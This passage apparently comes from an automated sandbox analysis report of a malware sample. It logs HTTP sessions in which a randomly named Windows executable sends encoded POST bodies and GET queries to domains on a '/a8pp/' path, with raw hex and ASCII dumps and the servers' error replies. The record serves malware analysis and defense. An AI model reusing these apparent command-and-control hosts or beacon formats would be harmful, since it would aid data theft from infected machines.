                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 47 75 45 37 59 4a 66 57 49 7a 2b 64 46 45 4c 49 4b 52 34 68 56 50 6f 30 38 71 49 54 64 34 6d 42 72 64 43 66 71 44 47 71 2b 56 78 53 43 42 2f 34 47 65 73 55 76 51 64 69 75 35 53 75 34 39 66 4d 6d 4b 4d 74 2f 50 31 43 64 31 6a 53 79 2f 44 42 54 2f 35 4a 6a 4d 41 48 49 72 58 6e 63 58 53 65 4b 71 59 4f 7a 65 57 62 70 4e 4f 57 61 2b 2f 59 71 64 6c 66 56 6f 77 6a 61 66 65 59 6a 7a 39 31 6b 64 45 38 71 76 77 5a 4e 55 69 71 71 6c 43 42 6c 68 73 45 59 4a 58 57 57 47 6b 7a 6a 48 74 31 69 76 73 44 45 67 41 77 35 73 52 52 4a 41 6d 54 73 56 47 6a 2f 79 4d 44 4f 70 4e 31 61 6c 50 2b 30 70 55 45 2b 78 57 75 36 38 3d
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITd4mBrdCfqDGq+VxSCB/4GesUvQdiu5Su49fMmKMt/P1Cd1jSy/DBT/5JjMAHIrXncXSeKqYOzeWbpNOWa+/YqdlfVowjafeYjz91kdE8qvwZNUiqqlCBlhsEYJXWWGkzjHt1ivsDEgAw5sRRJAmTsVGj/yMDOpN1alP+0pUE+xWu68=
                                        Jun 4, 2024 14:39:11.910677910 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:11 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        72192.168.11.3049866162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:14.417556047 CEST1682OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Origin: http://www.astralavenue.xyz
                                        Referer: http://www.astralavenue.xyz/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 4e 73 52 43 6c 61 76 67 77 31 31 66 68 47 75 45 37 59 4a 66 57 49 7a 2b 64 46 45 4c 49 4b 52 34 68 56 50 6f 30 38 71 49 54 64 77 6d 42 65 52 43 5a 4a 72 47 72 2b 56 78 59 69 42 36 34 47 65 78 55 76 6f 52 69 75 31 43 75 37 46 66 4b 45 79 4d 6c 71 37 31 49 64 31 6a 4b 43 2f 34 46 54 2f 57 4a 67 6b 45 48 49 37 58 6e 63 58 53 65 4d 57 59 4c 58 4b 57 49 35 4d 38 65 36 2b 37 63 71 64 4e 66 56 77 67 6a 61 62 6b 59 54 54 39 31 41 78 45 39 59 33 77 62 74 55 61 6d 4b 6c 61 42 6c 74 76 45 5a 6c 54 57 57 7a 4c 7a 6b 7a 74 2f 6c 4f 6f 62 45 63 6b 6d 62 4d 66 61 4b 34 74 62 4e 42 50 39 74 4f 63 51 4d 70 49 37 65 68 56 35 77 38 4d 54 4b 4e 4c 76 76 52 76 6f 2f 68 30 38 6c 4a 61 54 2f 49 6a 76 4a 55 34 55 7a 48 7a 76 30 47 58 5a 35 53 37 59 58 2f 61 38 74 65 4e 65 4f 76 32 61 6b 59 4e 50 31 55 39 4a 6f 61 4b 55 33 45 66 6e 73 49 57 76 47 49 49 37 42 59 65 41 43 32 59 33 31 6b 42 35 39 39 6f 53 31 2b 30 52 6a 74 61 65 7a 57 46 59 46 39 67 32 34 76 72 33 50 37 41 43 2f 6a 39 51 71 56 55 6e [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=NsRClavgw11fhGuE7YJfWIz+dFELIKR4hVPo08qITdwmBeRCZJrGr+VxYiB64GexUvoRiu1Cu7FfKEyMlq71Id1jKC/4FT/WJgkEHI7XncXSeMWYLXKWI5M8e6+7cqdNfVwgjabkYTT91AxE9Y3wbtUamKlaBltvEZlTWWzLzkzt/lOobEckmbMfaK4tbNBP9tOcQMpI7ehV5w8MTKNLvvRvo/h08lJaT/IjvJU4UzHzv0GXZ5S7YX/a8teNeOv2akYNP1U9JoaKU3EfnsIWvGII7BYeAC2Y31kB599oS1+0RjtaezWFYF9g24vr3P7AC/j9QqVUnULw9BooSaP3u5Dy6FcS81iuly4CB6u0TiBSdzOEUieIhtkRGcF6EPtXweMr8pDe5cjiFtOHmlX3tOnaePE/+4Zzb+k10+5WUqBbvNWEVRnSF6Yp38c8O6DaL5dvY0gisQtsftuz8B4EB2+Od7RwAKERfJDTUWSGGayX9YvYsNUWM30IyEhj98iWYtuISphiznGewJUMcBc8LUOotD4U9KVMA3JNddJsHtQHqOFMrvkC3Jz9N2Ft2/uB9tuL/+KmSF8XY2Sakr3u3A5T538N+jD9HYLqATjE+VmXRbL04ld/ZnrRSHy9NDqEFjnobFD85UR58pn4hE25GZTgl770A7JIATeD9mCFvQa0vG7hpkQWw8TaCSCw5+HdJckhgdZHyWiLqhcmUKgO52Wjp3plJrGg5IzX6bpYGliGwyJr6/VfUo9+6AGhVjjjf34QLVji4dRBU52ZRnyuol/cfvjQp8EqE7NjO4a1c1M1FfmmFu93xLQdMUhNIFJGNi+L4hTnKLXTT1t7cu4eqLR21wsRwscR19Li+eGRkIleDsRtgJnwE1jn0QVXKLxQQ7BkL8E6iNcaKZVUTc2/hSGYSY/nEfxwehhxrHMXVV7EDNmdS2Cxy66TTLqXdRk/ChpY4OLqB6alaOsvjPJfZsd7eNKDL2xG5/J9E/2m35i [TRUNCATED]
                                        Jun 4, 2024 14:39:14.609250069 CEST533INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:14 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        73192.168.11.3049867162.0.237.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:17.115878105 CEST470OUTGET /a8pp/?2NlhHLS8=Au5imsmV21JYiQqAtZZYW5jQMTc/TsZAtUnDsMKbX4YoEplVSL6Rm/9dTWFSyViTXIIw8p1ls4ghLUagt/HJKO94HieJHgrJIyAOML3UnsK6ear2OzXGe/M=&0z=jXZhddsppL HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Host: www.astralavenue.xyz
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Jun 4, 2024 14:39:17.297362089 CEST548INHTTP/1.1 404 Not Found
                                        Date: Tue, 04 Jun 2024 12:39:17 GMT
                                        Server: Apache
                                        Content-Length: 389
                                        Connection: close
                                        Content-Type: text/html; charset=utf-8
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                        Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        74192.168.11.304986864.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:22.530529022 CEST751OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 205
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 2b 5a 75 75 71 37 58 39 35 2b 65 42 59 6f 71 33 7a 2f 52 76 69 65 54 4f 43 39 35 6f 4b 34 59 4c 68 57 70 4b 64 4f 72 57 77 32 4c 4c 4d 48 51 5a 6c 47 37 45 46 36 47 58 33 30 33 43 45 65 75 35 30 2b 2f 52 54 47 35 6c 78 4f 53 4b 38 5a 73 4c 4f 75 5a 6f 57 47 4e 69 6c 42 43 6d 45 31 51 77 6a 2f 67 51 51 62 37 55 77 47 67 48 71 39 43 71 6c 2f 59 77 77 57 72 52 43 61 55 53 39 57 32 33 54 4b 76 54 51 6d 2b 54 43 42 38 43 34 43 45 6a 65 71 55 50 32 49 72 74 78 71 74 35 68 63 53 73 78 7a 51 57 33 46 36 62 4b 50 2f 31 73 65 4b 44 4f 56 2f 79 41 3d 3d
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1+Zuuq7X95+eBYoq3z/RvieTOC95oK4YLhWpKdOrWw2LLMHQZlG7EF6GX303CEeu50+/RTG5lxOSK8ZsLOuZoWGNilBCmE1Qwj/gQQb7UwGgHq9Cql/YwwWrRCaUS9W23TKvTQm+TCB8C4CEjeqUP2Irtxqt5hcSsxzQW3F6bKP/1seKDOV/yA==
                                        Jun 4, 2024 14:39:22.755132914 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:22 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        75192.168.11.304986964.190.62.22807152C:\Program Files (x86)\HlWFRFHwcZzUOwsWUjxSJKBQpOEAbxoRyJlQhucVtKzoEdFQoYBHpMlyJaCJKjBzumVonWw\eUbiubZkrHdFTtCYB.exe
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:25.280807018 CEST771OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 225
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 64 42 75 68 72 37 58 73 4a 2b 64 4c 34 6f 71 68 44 2f 56 76 6a 69 54 4f 44 34 30 6f 34 73 59 4c 42 6d 70 4e 59 36 72 56 77 32 4c 66 63 48 56 45 31 47 77 45 46 47 77 58 33 34 33 43 45 61 75 35 32 57 2f 52 67 65 2b 30 78 4f 51 53 4d 5a 71 45 75 75 5a 6f 57 47 4e 69 6c 56 6b 6d 45 74 51 77 53 50 67 66 56 6e 34 58 77 47 6a 58 61 39 43 68 46 2f 55 77 77 57 43 52 48 37 7a 53 2f 75 32 33 57 32 76 55 42 6d 78 5a 43 42 2b 4f 6f 44 32 72 2f 4b 51 4a 48 42 64 71 41 32 30 31 77 55 6d 74 6d 43 4b 4c 30 78 34 49 71 7a 53 70 74 7a 69 42 4d 55 6b 76 48 62 66 36 47 6d 4b 53 72 58 37 6a 6e 4c 33 66 4a 4b 6b 39 62 45 3d
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o4sYLBmpNY6rVw2LfcHVE1GwEFGwX343CEau52W/Rge+0xOQSMZqEuuZoWGNilVkmEtQwSPgfVn4XwGjXa9ChF/UwwWCRH7zS/u23W2vUBmxZCB+OoD2r/KQJHBdqA201wUmtmCKL0x4IqzSptziBMUkvHbf6GmKSrX7jnL3fJKk9bE=
                                        Jun 4, 2024 14:39:25.506483078 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:25 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        76192.168.11.304987064.190.62.2280
                                        TimestampBytes transferredDirectionData
                                        Jun 4, 2024 14:39:28.028928995 CEST1688OUTPOST /a8pp/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en
                                        Host: www.nurse-job2535.life
                                        Origin: http://www.nurse-job2535.life
                                        Referer: http://www.nurse-job2535.life/a8pp/
                                        Content-Length: 1141
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: max-age=0
                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                        Data Raw: 32 4e 6c 68 48 4c 53 38 3d 55 57 34 56 51 38 67 75 44 4a 37 68 31 64 42 75 68 72 37 58 73 4a 2b 64 4c 34 6f 71 68 44 2f 56 76 6a 69 54 4f 44 34 30 6f 34 30 59 4c 77 47 70 4e 37 53 72 55 77 32 4c 44 73 48 55 45 31 47 58 45 46 76 35 58 33 6c 56 43 47 53 75 34 56 75 2f 58 56 79 2b 39 78 4f 51 62 73 5a 72 4c 4f 76 62 6f 53 61 4a 69 6c 46 6b 6d 45 74 51 77 52 48 67 62 41 62 34 52 77 47 67 48 71 39 30 71 6c 2f 77 77 78 2b 7a 52 48 32 45 52 50 4f 32 33 32 47 76 56 7a 2b 78 52 43 42 34 4e 6f 44 75 72 2f 48 4f 4a 48 4d 69 71 41 79 4b 31 79 55 6d 73 53 7a 48 5a 6d 46 53 56 62 66 67 30 4f 6a 38 57 61 55 36 78 67 43 35 71 33 69 56 45 66 37 73 67 54 53 74 43 37 32 33 6e 50 5a 54 2f 49 50 35 37 5a 65 35 68 30 65 65 2b 59 64 4a 59 69 34 39 67 37 69 57 44 7a 70 4c 53 5a 35 2b 6e 58 39 41 2f 64 2f 4a 2f 44 36 47 37 53 64 69 54 76 68 31 74 6a 53 49 39 79 44 51 79 45 56 50 31 49 2b 77 41 45 63 43 58 75 35 6e 4b 6c 59 65 67 33 73 58 2f 55 2f 4c 39 33 58 4d 30 63 30 61 46 4d 71 50 30 51 74 52 41 47 63 4a 47 33 42 34 73 [TRUNCATED]
                                        Data Ascii: 2NlhHLS8=UW4VQ8guDJ7h1dBuhr7XsJ+dL4oqhD/VvjiTOD40o40YLwGpN7SrUw2LDsHUE1GXEFv5X3lVCGSu4Vu/XVy+9xOQbsZrLOvboSaJilFkmEtQwRHgbAb4RwGgHq90ql/wwx+zRH2ERPO232GvVz+xRCB4NoDur/HOJHMiqAyK1yUmsSzHZmFSVbfg0Oj8WaU6xgC5q3iVEf7sgTStC723nPZT/IP57Ze5h0ee+YdJYi49g7iWDzpLSZ5+nX9A/d/J/D6G7SdiTvh1tjSI9yDQyEVP1I+wAEcCXu5nKlYeg3sX/U/L93XM0c0aFMqP0QtRAGcJG3B4sgtfRCMcAqCUexAZiiM/wpLhoCw9F1UFh/VN/Y7CxB3Dp3w+HnpLI9osgDDVYjhWl+fXJOFE3PrnSmjllC6JppESmcMhEZsEJ8oVTmRvi7IDvMZLi5amhY39p6Sn4K+Qiu2S7BLxfbq574BCbAUXMdPhq7EscH9j8pE4Eqss9vGjcFpfoCLrfCvo/XX1BwBV5gwERyFh77SRnUVCHEYwQcLB/Q32aNN0DMk48CuJub18+BeG5r2T8gECCqAhoJUBFUSvIQa8AHsVMVnT6m5ZiJu0P12Na8d5KB8dS4I+ZuSogXgedgk8NMCgi7nVrq/+KYj/SzflQE9QJIPNYMHsFlKci08nu+lFp22SF7IdYNezkjBacpAkvpAo07VymJyxyq5YWwU20yMD37Dfyu6PG1JF0qqBnOx7dQ3W4Sr2YyD8O+tvik7ytjENWtI8e4rsQs7H5ii/E0GLRYEAvnRNV4AITG2rLlrI51cvkqCYZnY3xXjVahG77G/daGDKVd1lL52/FcTFhS1vUXO1hPkJP6sbNiGxZVzbRfagy9QCqwSp0Eu6CBpHorw+JyTi5I0xo2kHeVLBTc5YEG/QtHpyTGJaMe1/+fpflsJakaaW16tzzkVPy2PXK0GXz9ig6DBqnn+Yct5OsckqqbQwKQv7Q/q1V2nwK09jcoM [TRUNCATED]
                                        Jun 4, 2024 14:39:28.253918886 CEST701INHTTP/1.1 405 Not Allowed
                                        date: Tue, 04 Jun 2024 12:39:28 GMT
                                        content-type: text/html
                                        content-length: 556
                                        server: NginX
                                        connection: close
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        77192.168.11.304987164.190.62.2280
                                        TimestampBytes transferredDirectionData
